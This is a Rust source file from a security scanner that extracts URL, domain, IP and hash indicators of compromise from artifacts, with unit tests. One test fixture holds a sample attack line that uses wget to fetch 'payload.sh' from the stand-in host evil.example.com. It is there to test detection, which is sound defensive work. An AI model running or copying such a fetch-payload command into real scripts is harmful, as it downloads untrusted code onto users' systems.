Skip to main content

skill_veil_core/
ioc_extraction.rs

1//! Pure-offline extraction of URL / domain / IP / file-hash indicators from
2//! skill artifacts. The output feeds downstream enrichment tooling (e.g. the
3//! CLI's VT lookup) without adding any runtime dependency on the network from
4//! inside the core scanner.
5//!
6//! Design principles:
7//! - Deterministic, regex-based, no HTTP.
8//! - Always-on for scanned artifacts — the output is cheap to compute and
9//!   serialises to JSON so consumers can optionally fan it out to
10//!   enrichment services.
11//! - Conservative: only extract what we can recognise structurally; no
12//!   fuzzy inference.
13
14use crate::lazy_pattern;
15use serde::{Deserialize, Serialize};
16use sha2::{Digest, Sha256};
17use std::collections::BTreeSet;
18use std::path::{Path, PathBuf};
19
20lazy_pattern!(URL_PATTERN, r#"https?://[^\s"'<>`\{\}\[\]\(\)\\]{3,512}"#);
21
22lazy_pattern!(
23    IPV4_PATTERN,
24    r"\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\b"
25);
26
27// IPv6 is loose on purpose: catches full 8-group and compressed
28// (`::`) forms. Word boundaries prevent matching inside larger
29// hex-colon identifiers (custom UUIDs, opaque tokens) that
30// happen to contain `≥2` colons — without `\b` the second
31// alternative would gladly match an arbitrary
32// `abc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8` substring.
33lazy_pattern!(
34    IPV6_PATTERN,
35    r"\b(?:(?:[A-Fa-f0-9]{1,4}:){1,7}(?::[A-Fa-f0-9]{1,4}){1,7}|(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4})\b"
36);
37
38// Standalone host mentions like "sphinx.espuny.net:5000" without
39// scheme. Very conservative to avoid matching filenames / dotted
40// identifiers. Requires a TLD of ≥2 lowercase letters and rejects
41// obvious programming patterns (e.g. `object.method`).
42lazy_pattern!(
43    HOST_MENTION_PATTERN,
44    r"\b([a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?)+\.(?:com|net|org|io|dev|ai|fly\.dev|vercel\.app|co|me|xyz|app|cloud|tech|info|biz|pro|us|uk|de|fr|es|it|ru|cn|jp|hk|tw|kr|sg|in|br|mx|ca|au|nz|za|ae|tr|il|ch|nl|be|se|no|fi|dk|pl|ir|pk|sa|eg|th|vn|ph|id|my|ng))\b"
45);
46
47/// Collection of IOCs extracted from a single artifact (or package-level
48/// aggregate across many artifacts). All values are deduplicated and sorted
49/// so downstream cache keys are stable.
50#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
51pub struct ExtractedIocs {
52    pub urls: Vec<String>,
53    pub domains: Vec<String>,
54    pub ipv4: Vec<String>,
55    pub ipv6: Vec<String>,
56    /// (relative-path, sha256-hex) of each supporting artifact we hashed.
57    pub file_hashes: Vec<FileHash>,
58}
59
60#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
61pub struct FileHash {
62    pub path: PathBuf,
63    pub sha256: String,
64}
65
66impl ExtractedIocs {
67    pub fn is_empty(&self) -> bool {
68        self.urls.is_empty()
69            && self.domains.is_empty()
70            && self.ipv4.is_empty()
71            && self.ipv6.is_empty()
72            && self.file_hashes.is_empty()
73    }
74
75    /// Merge another extraction into `self`, deduplicating inline.
76    pub fn merge(&mut self, other: ExtractedIocs) {
77        fn merge_sorted(target: &mut Vec<String>, additions: Vec<String>) {
78            let mut set: BTreeSet<String> = target.drain(..).collect();
79            set.extend(additions);
80            *target = set.into_iter().collect();
81        }
82        merge_sorted(&mut self.urls, other.urls);
83        merge_sorted(&mut self.domains, other.domains);
84        merge_sorted(&mut self.ipv4, other.ipv4);
85        merge_sorted(&mut self.ipv6, other.ipv6);
86
87        let mut seen: BTreeSet<(PathBuf, String)> = self
88            .file_hashes
89            .drain(..)
90            .map(|h| (h.path, h.sha256))
91            .collect();
92        for h in other.file_hashes {
93            seen.insert((h.path, h.sha256));
94        }
95        self.file_hashes = seen
96            .into_iter()
97            .map(|(path, sha256)| FileHash { path, sha256 })
98            .collect();
99    }
100}
101
102/// Domains that must never be reported — loopback, localhost variants, and
103/// documentation/testing ranges. These otherwise pollute the IOC list and
104/// burn enrichment quota.
105const NOISE_DOMAINS: &[&str] = &[
106    "localhost",
107    "localhost.localdomain",
108    "example.com",
109    "example.org",
110    "example.net",
111    "test.com",
112    "invalid",
113];
114
115const NOISE_IPV4_PREFIXES: &[&str] = &[
116    "127.",     // loopback
117    "0.0.0.0",  // unspecified (exact string match below)
118    "10.",      // RFC1918 — common internal, skip noise
119    "192.168.", // RFC1918
120    "169.254.", // link-local (incl. IMDS — we keep via a separate keep-list)
121                // 172.16.0.0/12 (172.16.0.0 – 172.31.255.255) is handled by
122                // `is_rfc1918_172` because the second octet has a numeric range that a
123                // string prefix cannot express. Using "172.16." here would only match
124                // /16, leaving 172.17.x.x (default Docker bridge) through 172.31.x.x
125                // unfiltered — those would leak into VT lookups as false-positive IOCs.
126];
127
128/// IPv4 addresses we deliberately *keep* even though they'd otherwise be
129/// filtered as internal — they have threat-intel value.
130const KEEP_SPECIAL_IPV4: &[&str] = &[
131    "169.254.169.254", // cloud metadata service
132];
133
134/// Hard upper bound on the number of distinct IOC strings of any single
135/// kind (URLs, domains, IPv4, IPv6) extracted from one artifact.
136/// Mitigates a memory-exhaustion vector where a crafted artifact ships
137/// millions of unique URLs / IPs and the unbounded `BTreeSet`s grow
138/// to several GB before returning. The limit is generous enough that
139/// a real package with hundreds of unique IOCs is unaffected, while a
140/// 50 MB synthetic file with a million unique URLs is truncated with
141/// a `tracing::warn` so operators see the cap was hit.
142pub const MAX_IOCS_PER_KIND_PER_ARTIFACT: usize = 4_096;
143
144/// Extract IOCs from a single artifact's textual content plus its path.
145/// `path` is used for (a) computing the file hash and (b) attaching to the
146/// returned FileHash record.
147pub fn extract_from_artifact(path: &Path, content: &[u8]) -> ExtractedIocs {
148    let mut out = if let Ok(text) = std::str::from_utf8(content) {
149        extract_from_text(text)
150    } else {
151        // Lossy decode so we can still find ASCII IOCs embedded in binaries.
152        let lossy = String::from_utf8_lossy(content);
153        extract_from_text(&lossy)
154    };
155    out.file_hashes.push(FileHash {
156        path: path.to_path_buf(),
157        sha256: sha256_hex(content),
158    });
159    out
160}
161
162/// Extract URL/domain/IP indicators from a string (no file-hash computed).
163///
164/// Each output kind is capped at [`MAX_IOCS_PER_KIND_PER_ARTIFACT`].
165/// Reaching the cap emits a `tracing::warn!` so operators can tell when
166/// truncation occurred. Pre-fix the `BTreeSet`s grew without bound, so
167/// a crafted 50 MB artifact with millions of unique URLs / IPs caused
168/// several-GB heap growth before returning.
169pub fn extract_from_text(text: &str) -> ExtractedIocs {
170    let mut urls: BTreeSet<String> = BTreeSet::new();
171    let mut domains: BTreeSet<String> = BTreeSet::new();
172    let mut ipv4: BTreeSet<String> = BTreeSet::new();
173    let mut ipv6: BTreeSet<String> = BTreeSet::new();
174
175    /// Insert into a bounded IOC set; returns `false` once the set is
176    /// at capacity. Callers stop their inner loop on `false` so they
177    /// do not keep allocating regex matches into a discarded value.
178    fn try_insert_bounded(set: &mut BTreeSet<String>, value: String, kind: &'static str) -> bool {
179        if set.len() >= MAX_IOCS_PER_KIND_PER_ARTIFACT {
180            tracing::warn!(
181                kind,
182                cap = MAX_IOCS_PER_KIND_PER_ARTIFACT,
183                "ioc_extraction: per-artifact IOC cap reached; truncating further matches"
184            );
185            return false;
186        }
187        set.insert(value);
188        true
189    }
190
191    for m in URL_PATTERN.find_matches(text) {
192        let raw = m.matched_text.as_str();
193        let trimmed = raw.trim_end_matches([',', '.', ';', ':', ')', ']', '}', '!', '?']);
194        if !try_insert_bounded(&mut urls, trimmed.to_string(), "url") {
195            break;
196        }
197        if let Some(host) = extract_host_from_url(trimmed) {
198            if !is_noise_domain(&host) && !is_ipv4(&host) && !is_ipv6(&host) {
199                // Domain cap reached: skip insertion but keep scanning URLs.
200                // Check cap before calling try_insert_bounded to avoid
201                // repeated warn! on every URL-domain pair after the cap.
202                if domains.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT {
203                    try_insert_bounded(&mut domains, host, "domain");
204                }
205            }
206        }
207    }
208
209    for m in HOST_MENTION_PATTERN.find_matches(text) {
210        let host = m.matched_text.to_ascii_lowercase();
211        if !is_noise_domain(&host) && !try_insert_bounded(&mut domains, host, "domain") {
212            break;
213        }
214    }
215
216    for m in IPV4_PATTERN.find_matches(text) {
217        let ip = m.matched_text.as_str();
218        if !is_noise_ipv4(ip) && !try_insert_bounded(&mut ipv4, ip.to_string(), "ipv4") {
219            break;
220        }
221    }
222
223    for m in IPV6_PATTERN.find_matches(text) {
224        let ip = m.matched_text;
225        // Mirror `is_ipv6`: require colon-group boundary AND a plausible
226        // IPv6 shape. Without `is_plausible_ipv6` the extractor silently
227        // accepted hex-colon tokens (e.g. 4-group session IDs without `::`
228        // and without 8 groups) that `is_ipv6` would reject — leaking
229        // false-positive IOCs into VT lookups and finding evidence.
230        if ip.matches(':').count() >= 2
231            && is_plausible_ipv6(&ip)
232            && !try_insert_bounded(&mut ipv6, ip, "ipv6")
233        {
234            break;
235        }
236    }
237
238    ExtractedIocs {
239        urls: urls.into_iter().collect(),
240        domains: domains.into_iter().collect(),
241        ipv4: ipv4.into_iter().collect(),
242        ipv6: ipv6.into_iter().collect(),
243        file_hashes: Vec::new(),
244    }
245}
246
247fn extract_host_from_url(url: &str) -> Option<String> {
248    let after_scheme = url.split_once("://").map(|(_, rest)| rest)?;
249    let no_userinfo = after_scheme
250        .split_once('@')
251        .map_or(after_scheme, |(_, h)| h);
252    let end = no_userinfo
253        .find(['/', '?', '#'])
254        .unwrap_or(no_userinfo.len());
255    let host_port = &no_userinfo[..end];
256    // Strip port (for IPv6 hosts the port comes after `]`). We return just
257    // the host component, lowercased.
258    let host = if host_port.starts_with('[') {
259        host_port
260            .split(']')
261            .next()
262            .map(|s| s.trim_start_matches('['))
263    } else {
264        host_port.split(':').next()
265    };
266    host.map(|h| h.to_ascii_lowercase())
267        .filter(|h| !h.is_empty())
268}
269
270fn is_noise_domain(domain: &str) -> bool {
271    let d = domain.to_ascii_lowercase();
272    NOISE_DOMAINS.iter().any(|n| d == *n)
273}
274
275fn is_noise_ipv4(ip: &str) -> bool {
276    if KEEP_SPECIAL_IPV4.contains(&ip) {
277        return false;
278    }
279    if ip == "0.0.0.0" {
280        return true;
281    }
282    if NOISE_IPV4_PREFIXES
283        .iter()
284        .any(|prefix| ip.starts_with(prefix))
285    {
286        return true;
287    }
288    is_rfc1918_172(ip)
289}
290
291/// Match the RFC1918 172.16.0.0/12 block (172.16.0.0 – 172.31.255.255).
292///
293/// String-prefix matching can't express the numeric range on the second
294/// octet, so we parse it explicitly. Without this check, 172.17.x.x (the
295/// default Docker bridge subnet) through 172.31.x.x would pass as
296/// public-looking IOCs and leak into VT lookups.
297fn is_rfc1918_172(ip: &str) -> bool {
298    let mut parts = ip.split('.');
299    let (Some(a), Some(b)) = (parts.next(), parts.next()) else {
300        return false;
301    };
302    if a != "172" {
303        return false;
304    }
305    matches!(b.parse::<u8>(), Ok(16..=31))
306}
307
308fn is_ipv4(s: &str) -> bool {
309    IPV4_PATTERN.is_match(s) && s.matches('.').count() == 3
310}
311
312fn is_ipv6(s: &str) -> bool {
313    s.matches(':').count() >= 2 && IPV6_PATTERN.is_match(s) && is_plausible_ipv6(s)
314}
315
316/// Reject 8-group hex-colon strings that look like custom session
317/// identifiers rather than addresses. The regex `\b...\b` boundary
318/// alone cannot stop tokens like `=abc1:abc2:...:abc8 ` whose
319/// surrounding chars are also `\W`. Compressed forms (`::`) are real
320/// IPv6 by structure; full 8-group forms must additionally satisfy the
321/// per-group length constraint (≤4 hex chars).
322fn is_plausible_ipv6(s: &str) -> bool {
323    if s.contains("::") {
324        return true;
325    }
326    let groups: Vec<&str> = s.split(':').collect();
327    groups.len() == 8 && groups.iter().all(|g| !g.is_empty() && g.len() <= 4)
328}
329
330fn sha256_hex(bytes: &[u8]) -> String {
331    let mut hasher = Sha256::new();
332    hasher.update(bytes);
333    format!("{:x}", hasher.finalize())
334}
335
336#[cfg(test)]
337mod tests {
338    use super::*;
339
340    /// # Contract
341    ///
342    /// `extract_from_text` MUST cap each IOC kind at
343    /// `MAX_IOCS_PER_KIND_PER_ARTIFACT`. Pre-fix the `BTreeSet`s grew
344    /// without bound, so a crafted artifact with millions of unique
345    /// URLs caused multi-GB heap growth before returning. The cap is
346    /// generous enough that real packages (hundreds of unique IOCs)
347    /// are unaffected; we hit it only on synthetic adversarial input.
348    #[test]
349    fn extract_from_text_caps_url_count_per_artifact() {
350        let mut text = String::new();
351        // Synthesise more URLs than the cap so we know truncation fires.
352        let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 256;
353        for n in 0..target {
354            use std::fmt::Write;
355            let _ = writeln!(text, "see https://example-{n}.test/ for details");
356        }
357        let iocs = extract_from_text(&text);
358        assert!(
359            iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
360            "URL set must be capped at {}; got {}",
361            MAX_IOCS_PER_KIND_PER_ARTIFACT,
362            iocs.urls.len()
363        );
364    }
365
366    #[test]
367    fn extracts_urls_and_domains_from_script() {
368        let text = "curl -s -X POST http://sphinx.espuny.net:5000/v1/audio ; wget https://evil.example.com/payload.sh";
369        let iocs = extract_from_text(text);
370        assert!(iocs
371            .urls
372            .iter()
373            .any(|u| u.starts_with("http://sphinx.espuny.net:5000")));
374        assert!(iocs
375            .urls
376            .iter()
377            .any(|u| u.starts_with("https://evil.example.com")));
378        assert!(iocs.domains.contains(&"sphinx.espuny.net".to_string()));
379        // example.com is noise-filtered; evil.example.com stays.
380        assert!(iocs.domains.iter().any(|d| d == "evil.example.com"));
381    }
382
383    #[test]
384    fn filters_loopback_and_private_ips() {
385        let text = "target = 127.0.0.1  fallback = 10.0.0.5  router = 192.168.1.1  public = 8.8.8.8  imds = 169.254.169.254";
386        let iocs = extract_from_text(text);
387        assert!(iocs.ipv4.contains(&"8.8.8.8".to_string()));
388        assert!(iocs.ipv4.contains(&"169.254.169.254".to_string())); // IMDS kept
389        assert!(!iocs.ipv4.contains(&"127.0.0.1".to_string()));
390        assert!(!iocs.ipv4.contains(&"10.0.0.5".to_string()));
391        assert!(!iocs.ipv4.contains(&"192.168.1.1".to_string()));
392    }
393
394    /// Contract: the RFC1918 172.16.0.0/12 block is fully filtered.
395    /// Without `is_rfc1918_172`, only 172.16.x.x was suppressed via the
396    /// "172.16." string prefix, leaving 172.17.x.x – 172.31.x.x (notably
397    /// the default Docker bridge subnet) leaking into VT IOCs.
398    #[test]
399    fn is_noise_ipv4_covers_full_rfc1918_172_12_block() {
400        for ip in [
401            "172.16.0.1",
402            "172.17.0.1", // default Docker bridge
403            "172.18.0.42",
404            "172.20.5.5",
405            "172.31.255.255",
406        ] {
407            assert!(
408                is_noise_ipv4(ip),
409                "172.16.0.0/12 must be filtered; failed for {ip}"
410            );
411        }
412        for ip in ["172.15.0.1", "172.32.0.1", "172.0.0.1"] {
413            assert!(
414                !is_noise_ipv4(ip),
415                "{ip} is outside RFC1918 172.16.0.0/12 and must NOT be filtered"
416            );
417        }
418    }
419
420    /// E2E: real text with mixed IOCs proves the integration path
421    /// (extraction → filter) honors the /12 contract end-to-end.
422    #[test]
423    fn extract_filters_full_rfc1918_172_12_block_e2e() {
424        let text =
425            "docker = 172.17.0.5  internal = 172.20.1.1  public = 9.9.9.9  edge = 172.32.0.1";
426        let iocs = extract_from_text(text);
427        assert!(!iocs.ipv4.contains(&"172.17.0.5".to_string()));
428        assert!(!iocs.ipv4.contains(&"172.20.1.1".to_string()));
429        assert!(iocs.ipv4.contains(&"9.9.9.9".to_string()));
430        assert!(iocs.ipv4.contains(&"172.32.0.1".to_string()));
431    }
432
433    /// Contract: IPv6 extraction MUST require word boundaries. Otherwise
434    /// arbitrary 8-group hex-colon identifiers (custom UUIDs, opaque
435    /// tokens) embedded in code or logs would surface as IPv6 IOCs.
436    #[test]
437    fn ipv6_extraction_rejects_unbounded_hex_runs_in_identifiers() {
438        let text = "token=xabc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8x more text";
439        let iocs = extract_from_text(text);
440        assert!(
441            iocs.ipv6.is_empty(),
442            "IPv6 must NOT match inside identifier word characters; got {:?}",
443            iocs.ipv6
444        );
445    }
446
447    /// Contract: extraction MUST run `is_plausible_ipv6` to reject
448    /// hex-colon tokens that match the regex but aren't real IPv6.
449    /// A 4-group token like `abc1:def2:1234:5678` (no `::`, fewer than
450    /// 8 groups) passes both the regex and the `colons >= 2` heuristic;
451    /// without the plausibility gate it leaked into IOC output and was
452    /// shipped to VT as a false positive. Mirrors `is_ipv6` (line 283).
453    #[test]
454    fn ipv6_extraction_rejects_short_hex_token_lacking_double_colon() {
455        let text = "session = abc1:def2:1234:5678 next";
456        let iocs = extract_from_text(text);
457        assert!(
458            iocs.ipv6.is_empty(),
459            "4-group hex-colon token without `::` must NOT extract as IPv6; got {:?}",
460            iocs.ipv6
461        );
462    }
463
464    /// Sanity: legitimate IPv6 still extracts.
465    #[test]
466    fn ipv6_extraction_keeps_valid_addresses() {
467        let text = "endpoint = 2001:db8::dead:beef:1; alt = fe80::1";
468        let iocs = extract_from_text(text);
469        assert!(
470            iocs.ipv6.iter().any(|i| i.contains("2001:db8")),
471            "Valid IPv6 must still match; got {:?}",
472            iocs.ipv6
473        );
474    }
475
476    /// Contract: `is_plausible_ipv6` rejects strings without `::` whose
477    /// group structure does not match a strict 8-group form with each
478    /// group 1..=4 hex chars. Compressed (`::`) forms always pass.
479    #[test]
480    fn is_plausible_ipv6_rejects_overlong_groups() {
481        // 5-char group is invalid in IPv6.
482        assert!(!is_plausible_ipv6(
483            "aaaaa:bbbb:cccc:dddd:eeee:ffff:1111:2222"
484        ));
485    }
486
487    #[test]
488    fn is_plausible_ipv6_accepts_compressed_form() {
489        assert!(is_plausible_ipv6("2001:db8::1"));
490        assert!(is_plausible_ipv6("fe80::1"));
491    }
492
493    #[test]
494    fn is_plausible_ipv6_accepts_full_8_group_form() {
495        assert!(is_plausible_ipv6("2001:0db8:85a3:0000:0000:8a2e:0370:7334"));
496    }
497
498    #[test]
499    fn hashes_artifact_content() {
500        let iocs = extract_from_artifact(Path::new("script.sh"), b"hello world");
501        assert_eq!(iocs.file_hashes.len(), 1);
502        assert_eq!(
503            iocs.file_hashes[0].sha256,
504            // sha256("hello world")
505            "b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
506        );
507    }
508
509    #[test]
510    fn ipv6_basic_extraction() {
511        let text = "endpoint = 2001:db8::dead:beef:1";
512        let iocs = extract_from_text(text);
513        assert!(iocs.ipv6.iter().any(|i| i.contains("2001:db8")));
514    }
515
516    #[test]
517    fn deduplicates_and_sorts() {
518        let text = "https://a.com/x  https://a.com/y  https://a.com/x 8.8.8.8 8.8.4.4 8.8.8.8";
519        let iocs = extract_from_text(text);
520        assert_eq!(
521            iocs.ipv4,
522            vec!["8.8.4.4".to_string(), "8.8.8.8".to_string()]
523        );
524        assert!(iocs.urls.len() >= 2);
525    }
526
527    #[test]
528    fn merge_combines_disjoint_lists() {
529        let mut a = extract_from_text("https://foo.com/x 1.1.1.1");
530        let b = extract_from_text("https://bar.io/y 8.8.8.8");
531        a.merge(b);
532        assert!(a.domains.contains(&"foo.com".to_string()));
533        assert!(a.domains.contains(&"bar.io".to_string()));
534        assert!(a.ipv4.contains(&"1.1.1.1".to_string()));
535        assert!(a.ipv4.contains(&"8.8.8.8".to_string()));
536    }
537
538    #[test]
539    fn does_not_flag_programming_identifiers_as_domains() {
540        let text = "object.method.name = func.call() # not a host";
541        let iocs = extract_from_text(text);
542        assert!(
543            iocs.domains.is_empty(),
544            "got false-positive: {:?}",
545            iocs.domains
546        );
547    }
548
549    /// # Contract
550    ///
551    /// When the domain cap is reached, `extract_from_text` MUST continue
552    /// scanning URLs for their domains without emitting repeated
553    /// `tracing::warn!` on every URL-domain pair. Pre-fix the code called
554    /// `try_insert_bounded` on every domain after the cap, logging a warn
555    /// for each — on adversarial inputs with thousands of URLs, this
556    /// produced thousands of identical log lines.
557    #[test]
558    fn domain_cap_does_not_spam_repeated_warns() {
559        let mut text = String::new();
560        // Exceed the domain cap, then add more URLs to prove scanning
561        // continues past the cap without calling try_insert_bounded.
562        let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 100;
563        for n in 0..target {
564            use std::fmt::Write;
565            let _ = writeln!(text, "see https://unique-{n}.example.com/");
566        }
567        let iocs = extract_from_text(&text);
568        assert!(
569            iocs.domains.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
570            "domain set must be capped at {}; got {}",
571            MAX_IOCS_PER_KIND_PER_ARTIFACT,
572            iocs.domains.len()
573        );
574        // All URLs still scanned (the URL cap is independent).
575        assert!(
576            iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
577            "URL set must also be capped; got {}",
578            iocs.urls.len()
579        );
580    }
581}